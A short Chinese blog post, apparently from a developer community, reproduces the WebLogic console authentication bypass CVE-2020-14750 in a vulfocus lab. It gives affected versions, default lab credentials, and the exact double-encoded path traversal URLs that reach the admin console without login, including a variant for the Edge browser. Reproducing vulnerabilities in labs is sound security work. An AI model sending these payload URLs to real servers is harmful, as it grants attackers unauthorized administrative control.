事项 | 描述 |
---|---|
漏洞概述 | 远程攻击者可以构造特殊的 HTTP 请求,在未经身份验证的情况下接管 WebLogic Server Console |
影响范围 | 10.3.6.0、12.1.3.0、12.2.1.3、12.2.1.4、14.1.1.0 |
漏洞编号 | CVE-2020-14750 |
这里使用vulfocus进行复现。
访问http://192.168.146.167:34029/console/login/LoginForm.jsp,搭建成功。
需要注意的是,需要我们先登录才行,不登陆就无法进行未授权,weblogic/welcome1。这里我是在虚拟机里面进行登录的,下面的验证是在本机进行验证的。
访问http://192.168.146.167:34029/console/css/%252e%252e%252fconsole.portal,发现有些浏览器可以绕过登录,比如火狐浏览器或者谷歌浏览器。
但是,使用Edge浏览器的时候,发现绕不了,很奇怪。
于是自己一直进行尝试,找到了有个Edge浏览器也可以绕过的url。访问http://192.168.146.167:34029/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=DomainConfigGeneralPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29。
然后尝试查找上传文件的地方,找了很久发现没有文件上传的地方。。。正常的流程是在后台有一个锁定并编辑的按钮的,但是我没有。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。